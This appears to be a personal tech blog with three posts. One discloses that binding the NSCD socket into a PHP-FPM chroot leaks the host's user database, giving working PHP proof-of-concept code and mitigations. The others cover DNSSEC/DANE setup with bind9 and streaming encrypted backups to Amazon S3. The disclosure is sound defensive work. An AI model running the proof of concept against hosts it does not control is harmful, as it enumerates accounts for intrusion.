
NSCD socket in a PHP-FPM chroot leaks user database

On Wed, 20 Apr 2016 20:54:08 +0200 by Falco Nordmann

If you configure your web server to serve PHP scripts with PHP-FPM, you have the option of executing the interpreter in a chrooted environment to prevent scripts from accessing files outside a given directory tree. While this is a great security feature, it comes with some drawbacks if the PHP scripts need resources from outside the chroot to do their work.

A common example is DNS resolution. If you try to resolve a hostname from inside a PHP-FPM chroot, it won't succeed until you make certain locations of the file system available inside the chroot.
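You can see this with a one-line test script served from inside the chroot (the file name resolve_test.php and the host example.org are only placeholders); gethostbyname() returns the hostname unchanged when resolution fails:

resolve_test.php
<?php
	# Prints an IP address on success; prints the hostname unchanged
	# if resolution fails inside the chroot.
	header('Content-Type: text/plain');
	echo gethostbyname('example.org');
?>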

A common workaround suggested by some tutorials is to bind the NSCD socket into the chroot.

root@webhost:~# mkdir -p /home/www/u000/chroot/var/run/nscd
root@webhost:~# touch /home/www/u000/chroot/var/run/nscd/socket
root@webhost:~# mount --bind /var/run/nscd/socket /home/www/u000/chroot/var/run/nscd/socket

This will solve the problem, and DNS resolution will work from inside the chroot.

However, since NSCD does not only provide name resolution for domain names, but also for the system's users and groups, this configuration may also expose sensitive information inside the chroot.

As a proof of concept, I wrote some code to demonstrate how user information can be queried from NSCD from inside a PHP-FPM chroot.

nscd_passwd.php
<?php
	# PoC code to demonstrate querying user information from NSCD
	# from inside a PHP-FPM chroot.

	header('Content-Type: text/plain');

	# Username to look up; defaults to root.
	$u = isset($_GET['u']) ? $_GET['u'] : 'root';

	# Connect to the NSCD socket bound into the chroot.
	$s = fsockopen('unix:///var/run/nscd/socket', -1, $en, $es);
	$s || die("Err $en:$es");

	# NSCD request: protocol version 2, request type 0 (GETPWBYNAME),
	# key length (including the trailing NUL byte), then the key itself.
	fwrite($s, sprintf("\x02\0\0\0\0\0\0\0%c\0\0\0%s\0", strlen($u) + 1, $u));

	# Walk the response backwards and print each NUL-terminated string
	# (shell, home directory, GECOS, password field, username) until two
	# consecutive NUL bytes mark the end of the binary response header.
	$r = fread($s, 2048);
	for ($i = strlen($r) - 2, $b = ''; ; --$i) {
		if ($r[$i] === "\0") {
			if ($r[$i + 1] === "\0") break;
			echo strrev($b) . "\n";
			$b = '';
		} else {
			$b .= $r[$i];
		}
	}
	fclose($s);
?>

Upload this script into a PHP-FPM chroot with an available NSCD socket and open it in your browser. Optionally, you can pass ?u=<username> to the script to get information on a certain user. If no username is supplied, root will be used.

This will output the fields of the user's passwd entry (in reverse order, shell first):

/bin/bash
/root
root
x
root

To close this leak, you can configure NSCD to serve nothing but the hosts database by setting enable-cache to no for all other databases in /etc/nscd.conf. However, this may degrade your overall system performance, since user and group information then has to be retrieved from its source directly on every lookup.
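A corresponding /etc/nscd.conf might look roughly like the following excerpt (the exact set of databases depends on your nscd version, so take the entries as an illustration rather than a complete file):

/etc/nscd.conf (excerpt)
	enable-cache	passwd		no
	enable-cache	group		no
	enable-cache	hosts		yes
	enable-cache	services	no
	enable-cache	netgroup	no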

A better alternative is to bind-mount libnss_dns.so.2 and /etc/resolv.conf into the PHP-FPM chroot instead.

For Debian 8:

root@webhost:~# mkdir -p /home/www/u000/chroot/lib/x86_64-linux-gnu /home/www/u000/chroot/etc
root@webhost:~# touch /home/www/u000/chroot/lib/x86_64-linux-gnu/libnss_dns.so.2 /home/www/u000/chroot/etc/resolv.conf
root@webhost:~# mount --bind /lib/x86_64-linux-gnu/libnss_dns.so.2 /home/www/u000/chroot/lib/x86_64-linux-gnu/libnss_dns.so.2
root@webhost:~# mount -o "remount,ro" /home/www/u000/chroot/lib/x86_64-linux-gnu/libnss_dns.so.2
root@webhost:~# mount --bind /etc/resolv.conf /home/www/u000/chroot/etc/resolv.conf
root@webhost:~# mount -o "remount,ro" /home/www/u000/chroot/etc/resolv.conf

This will allow the interpreter to resolve domain names from inside the chroot and won't reveal the user database.

DNSSEC & DANE

On Tue, 15 Mar 2016 15:17:48 +0100 by Falco Nordmann

Today, I spent some time rolling out DNSSEC for some of my zones to enable clients to verify DNS responses from my nameservers. I also added TLSA records (see RFC 6698) for some domains and for my mail server to provide an additional indication that the TLS certificates sent to the client come from me.

To benefit from DNSSEC and DANE in daily internet life, you can install the DNSSEC/TLSA Validator add-on in your browser. It provides two additional indicators beside your address bar, which tell you:

  • Whether the domain name of the URL you are visiting is secured by DNSSEC.
  • Whether there is a TLSA record available for the domain, and whether it corresponds to the TLS certificate or public key of the web server.

In the extension's preferences you can enable the option “Cancel HTTPS connection when TLSA validation fails”. This may protect you from a man-in-the-middle attack even if the attacker was able to obtain a certificate for the domain from a trusted authority.

If you want to secure your zone with DNSSEC, you first have to find out whether your registrar allows you to upload your KSK (or rather the DS record derived from it) to the registry. Unfortunately, this is still not common. If you can't find such an option in your registrar's control panel, open a support ticket and ask for it.

Then, you need to generate your keys, sign your zones and supply TLSA records for your certificates. Since the keys used along with DNSSEC are comparatively short, you are well-advised to rotate them regularly.

Here are some recommendations on how to achieve all this with bind9 and its "inline signing" feature.
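As a rough sketch, assuming bind9 with inline signing (the key algorithm, key sizes, paths, the example.com zone and the key tag are placeholders to adapt to your own setup), the keys are generated with dnssec-keygen:

root@ns:~# dnssec-keygen -a RSASHA256 -b 2048 -f KSK -K /etc/bind/keys example.com
root@ns:~# dnssec-keygen -a RSASHA256 -b 1024 -K /etc/bind/keys example.com

The zone definition in named.conf then only needs to point to the key directory and enable automatic signing:

zone "example.com" {
	type master;
	file "/etc/bind/zones/db.example.com";
	key-directory "/etc/bind/keys";
	auto-dnssec maintain;
	inline-signing yes;
};

The DS record to hand over to your registrar can be derived from the KSK with dnssec-dsfromkey, and the digest for a "3 1 1" TLSA record (DANE-EE, SubjectPublicKeyInfo, SHA-256) can be computed from the server certificate's public key:

root@ns:~# dnssec-dsfromkey /etc/bind/keys/Kexample.com.+008+12345.key
root@ns:~# openssl x509 -in /etc/ssl/example.com.crt -noout -pubkey | \
> openssl pkey -pubin -outform DER | sha256sum

The resulting digest goes into a record such as _443._tcp.www.example.com. IN TLSA 3 1 1 <digest> (or _25._tcp.mail.example.com. for a mail server).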

Pipe data from STDIN to Amazon S3

On Fri, 22 Nov 2013 22:00:29 +0100 by Falco Nordmann

When looking for a solution to store offsite backups during my travels, I wanted to upload incremental as well as encrypted backups to Amazon S3, since the API is simple to use and the pricing is affordable, especially when using Amazon's lifecycle management to transfer S3 objects to Amazon Glacier automatically.

While evaluating the available tools, I discovered that most S3 clients cannot stream data piped into them via STDIN directly (through RAM) to an S3 bucket, but need to store the whole data set as a file on your hard drive before uploading it. The main reason for this limitation is that Amazon's S3 API expects the size (Content-Length) of the data to be stored before receiving the data itself. Searching further, I found js3tream, which works around the problem by splitting the input stream into chunks of fixed size and storing them as separate objects in the given S3 bucket. But when I tried to work with this tool, I got nothing but a bunch of exceptions, and even though my Java is acceptable I was not able to spot the root of the problem.

However, Amazon has supported a more suitable way to upload data in multiple chunks since 2010 than the one js3tream uses. The S3 API allows an object to be uploaded in multiple parts and expects the Content-Length of each part instead of the Content-Length of the whole object. Using this mechanism, it is possible to split the input stream into chunks and upload one chunk after another until the end of the stream is reached. When searching for tools supporting this feature, I only found clients that read from files rather than from STDIN. While s3cmd is able to stream stored data from S3 to STDOUT, it is not able to stream data from STDIN to S3, even though this feature has been announced. Since I could not find any client suitable for my needs, I wrote a Python script that uses boto's S3 interface to upload data read from STDIN chunkwise to S3 via Amazon's multipart upload API.
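The core of this approach can be sketched in a few lines of boto (an illustration of the mechanism only, not the actual script; bucket name, key name, and part size are placeholders):

#!/usr/bin/env python
# Sketch: stream STDIN to S3 in fixed-size parts via boto's multipart
# upload API, so only one part has to be held in RAM at a time.
import sys
from cStringIO import StringIO
import boto

CHUNK = 16 * 1024 * 1024              # part size; S3 requires >= 5 MB for all parts but the last
bucket_name, key_name = sys.argv[1], sys.argv[2]

conn = boto.connect_s3()              # credentials from the environment or ~/.boto
bucket = conn.get_bucket(bucket_name)
upload = bucket.initiate_multipart_upload(key_name)
try:
    part = 1
    while True:
        data = sys.stdin.read(CHUNK)
        if not data:
            break
        # Each part is buffered in memory, so its Content-Length is known
        # without writing the whole stream to disk first.
        upload.upload_part_from_file(StringIO(data), part_num=part)
        part += 1
    upload.complete_upload()
except Exception:
    upload.cancel_upload()
    raise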

The script can be found on github. To use it for incremental backups, you can make use of the tips given in the tar HowTo of the js3tream project. To encrypt your backups you can pipe the data generated by tar through gpg.

# tar -g /etc/backup/home/diff -C / -vcpjO /home | \
> gpg -r com-example-backup-home -e | \
> 2s3 -k /etc/backup/home/aws-key -b com-example-backup-home -o backup.0

This example assumes that the file keeping track of the changes in your filesystem, as well as the file containing the AWS credentials for access to your S3 bucket, are stored in /etc/backup/home/, and that you have generated a GPG keypair named com-example-backup-home in the user's GPG keyring (# gpg --gen-key).

By running this command and incrementing the object's name (backup.1, backup.2, etc.) on every run, you can build an incremental, encrypted backup of your users' home directories.

To restore your backup, you can fetch the S3 object(s) using s3cmd and pipe the data back through gpg and tar the other way round.

# s3cmd get s3://com-example-backup-home/backup.0 - | gpg -d | tar -g /dev/null -C / -xvj
# s3cmd get s3://com-example-backup-home/backup.1 - | gpg -d | tar -g /dev/null -C / -xvj
...

Before using s3cmd, you have to configure it to connect to your S3 bucket. Have a look into the s3tools documentation for further information.
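With current s3cmd versions this is an interactive one-time step that asks for your AWS credentials and stores them in ~/.s3cfg:

# s3cmd --configure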